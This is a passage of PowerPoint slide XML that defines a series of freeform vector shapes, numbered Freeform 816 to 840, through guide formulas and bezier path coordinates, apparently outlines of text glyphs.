                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41CEB7FB-DA8D-49FD-B98F-2E77BE15A496}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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1546225" y="3756025"/>
              <a:ext cx="87313" cy="144463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0 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 80 w 188"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 274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0" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80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7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1" name="Freeform 816">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3B5855-CD76-48DA-A204-B0886AFADDF0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1651000" y="3797300"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21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3 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 21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7 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230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2" name="Freeform 817">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FE8F132-8AE9-422C-A763-10D4EA5F5002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1774825" y="3770313"/>
              <a:ext cx="96838" cy="130175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8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3" name="Freeform 818">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB595876-2C24-45D3-990F-00034D0CA92A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1898650" y="3756025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8 h 308"/>
                <a:gd name="T28" fmla="*/ 21 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 21 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 21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1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4" name="Freeform 819">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2294099C-FA9B-4C56-96E9-750BC1D1A4D2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047875" y="3736975"/>
              <a:ext cx="61913" cy="182563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7 h 387"/>
                <a:gd name="T4" fmla="*/ 34 w 132"/>
                <a:gd name="T5" fmla="*/ 193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3 h 387"/>
                <a:gd name="T14" fmla="*/ 40 w 132"/>
                <a:gd name="T15" fmla="*/ 322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5"/>
                    <a:pt x="128" y="363"/>
                    <a:pt x="119" y="357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="315"/>
                    <a:pt x="34" y="249"/>
                    <a:pt x="34" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="143"/>
                    <a:pt x="53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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="23" y="298"/>
                    <a:pt x="40" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="104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5" name="Freeform 820">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2667971A-1812-4C49-B7EE-8B1010C38B70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2146300" y="3756025"/>
              <a:ext cx="87313" cy="144463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5 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25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1 w 188"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21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5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5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8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6" name="Freeform 821">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84369EB9-7AC4-45CA-957B-8FCFC9C746F1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252663" y="3797300"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26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7 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77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7" name="Freeform 822">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8759715-0FA2-45E5-BE3E-FA9213882EA7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374900" y="3770313"/>
              <a:ext cx="96838" cy="130175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4 w 211"/>
                <a:gd name="T25" fmla="*/ 91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8" name="Freeform 823">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53474D08-151C-49DA-AB4C-CC2748821385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619375" y="3756025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8 h 308"/>
                <a:gd name="T28" fmla="*/ 21 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 21 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 21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1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9" name="Freeform 824">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0993F6C7-5160-4B72-BA18-27CFD14BC087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2738438" y="3756025"/>
              <a:ext cx="107950" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139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1 w 237"/>
                <a:gd name="T23" fmla="*/ 31 h 308"/>
                <a:gd name="T24" fmla="*/ 161 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 161 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 161 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 161 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 161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1" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="298"/>
                    <a:pt x="161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7"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="242"/>
                    <a:pt x="34" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150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0" name="Freeform 825">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94B71D9-433D-4CB4-8B88-8A53E1FEDEA2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890838" y="3870325"/>
              <a:ext cx="38100" cy="61913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2 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 131"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 30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4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5"/>
                    <a:pt x="10" y="30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44" y="62"/>
                    <a:pt x="48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1" name="Freeform 826">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED190D2E-67DC-4232-ACE7-F1F1BFF2A629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3106738" y="3797300"/>
              <a:ext cx="90488" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 166 h 223"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 152 h 223"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 163 h 223"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 223"/>
                <a:gd name="T8" fmla="*/ 34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1" y="152"/>
                    <a:pt x="178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4" y="158"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34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2" name="Freeform 827">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F752B8-5516-48D6-BF56-08A79338D6B3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3224213" y="3797300"/>
              <a:ext cx="93663" cy="103188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6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3" name="Freeform 828">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1420B064-E099-469D-82A5-BBC68DE79EB0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333750" y="3797300"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26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6" y="187"/>
                    <a:pt x="228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4" name="Freeform 829">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A6ED9BE-A813-4B56-A29C-22C1B8D56DBF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3467100" y="3797300"/>
              <a:ext cx="88900" cy="103188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8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5" name="Freeform 830">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD5BC16-DAD8-4644-A30D-63D328A1EFBA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3576638" y="3770313"/>
              <a:ext cx="96838" cy="130175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8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6" name="Freeform 831">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF21CDD7-BE1C-4EA3-92CB-D485CB1686CB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3827463" y="3797300"/>
              <a:ext cx="90488" cy="103188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5" y="158"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35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7" name="Freeform 832">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EB0701-7C12-4B4B-AB2F-86F1C01A1DFB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933825" y="3756025"/>
              <a:ext cx="115888" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 250"/>
                <a:gd name="T1" fmla="*/ 159 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 250"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 250"/>
                <a:gd name="T5" fmla="*/ 113 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 250"/>
                <a:gd name="T7" fmla="*/ 21 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 250"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 21 w 250"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 16 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 250"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 43 w 250"/>
                <a:gd name="T17" fmla="*/ 31 h 305"/>
                <a:gd name="T18" fmla="*/ 43 w 250"/>
                <a:gd name="T19" fmla="*/ 274 h 305"/>
                <a:gd name="T20" fmla="*/ 21 w 250"/>
                <a:gd name="T21" fmla="*/ 274 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 250"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 250"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 99 w 250"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 250"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 99 w 250"/>
                <a:gd name="T31" fmla="*/ 274 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 250"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 250"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 250"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 173 w 250"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 173 w 250"/>
                <a:gd name="T41" fmla="*/ 274 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 250"/>
                <a:gd name="T43" fmla="*/ 274 h 305"/>
                <a:gd name="T44" fmla="*/ 133 w 250"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 250"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 230 w 250"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 250 w 250"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 250"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 250"/>
                <a:gd name="T55" fmla="*/ 274 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 250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07" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="182" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="87"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="77" y="113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4"/>
                    <a:pt x="107" y="274"/>
                    <a:pt x="99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4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="133" y="274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30" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="305"/>
                    <a:pt x="250" y="305"/>
                    <a:pt x="250" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250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8" name="Freeform 833">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118DA216-CE36-44D3-890A-B14378C5773C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4064000" y="3797300"/>
              <a:ext cx="107950" cy="1031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2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6"/>
                    <a:pt x="35" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="132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9" name="Freeform 834">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3DDFAF-4E95-4CF7-92C1-FFA8CD245707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179888" y="3797300"/>
              <a:ext cx="103188" cy="10318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0" name="Freeform 835">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA2E062-10DD-4440-B764-EEE6C97E4058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427538" y="3778250"/>
              <a:ext cx="88900" cy="100013"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 194"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 159 w 194"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 194"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 194 w 194"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 187 w 194"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 194"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 194"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 194 w 194"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 174 w 194"/>
                <a:gd name="T17" fmla="*/ 45 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 194"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 194"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 194"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 194"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 194"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 194"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 17 w 194"/>
                <a:gd name="T31" fmla="*/ 45 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 194"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 194"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 67 w 194"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 13 w 194"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 194"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 194"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 194"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 194"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 194"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 194"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 194"/>
                <a:gd name="T53" fmla="*/ 13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15">
                  <a:moveTo>
                    <a:pt x="112" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="124" y="141"/>
                    <a:pt x="159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4" y="161"/>
                    <a:pt x="194" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="145"/>
                    <a:pt x="188" y="140"/>
                    <a:pt x="187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4" y="71"/>
                    <a:pt x="194" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="60"/>
                    <a:pt x="194" y="45"/>
                    <a:pt x="174" y="45"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="68"/>
                    <a:pt x="113" y="35"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="17"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="17"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="35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5"/>
                    <a:pt x="20" y="45"/>
                    <a:pt x="17" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="6" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="67" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7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9"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="199"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="180"/>
                    <a:pt x="113" y="147"/>
                    <a:pt x="112" y="1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1" name="Freeform 836">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21DE787D-D216-4192-A2B3-D65B6BDA0DB5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4541838" y="3756025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3 w 197"/>
                <a:gd name="T13" fmla="*/ 31 h 308"/>
                <a:gd name="T14" fmla="*/ 175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0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 308"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 308 h 308"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 308 h 308"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 293 h 308"/>
                <a:gd name="T44" fmla="*/ 155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0" y="93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2" name="Freeform 837">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034DDF29-F088-47A3-A1CA-B06F899FF390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4665663" y="3797300"/>
              <a:ext cx="93663" cy="103188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3" name="Freeform 838">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E520A40C-556B-4FE5-9EE2-25A43E89DFF7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779963" y="3797300"/>
              <a:ext cx="104775" cy="103188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4" name="Freeform 839">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF38E47-C5DA-4059-A7EF-646CA95ACEB7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891088" y="3797300"/>
              <a:ext cx="120650" cy="103188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3 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 260"/>
                <a:gd name="T11" fmla="*/ 187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7 h 218"/>
                <a:gd name="T22" fmla="*/ 57 w 260"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 260"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 260"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 260"/>
                <a:gd name="T29" fmla="*/ 187 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 260"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 115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7 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 260"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 260"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 260"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 260"/>
                <a:gd name="T47" fmla="*/ 187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7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100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5" y="187"/>
                    <a:pt x="57" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="54"/>
                    <a:pt x="77" y="30"/>
                    <a:pt x="98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7" y="187"/>
                    <a:pt x="94" y="187"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="108" y="218"/>
                    <a:pt x="115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7"/>
                    <a:pt x="249" y="187"/>
                    <a:pt x="231" y="187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5" name="Freeform 840">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
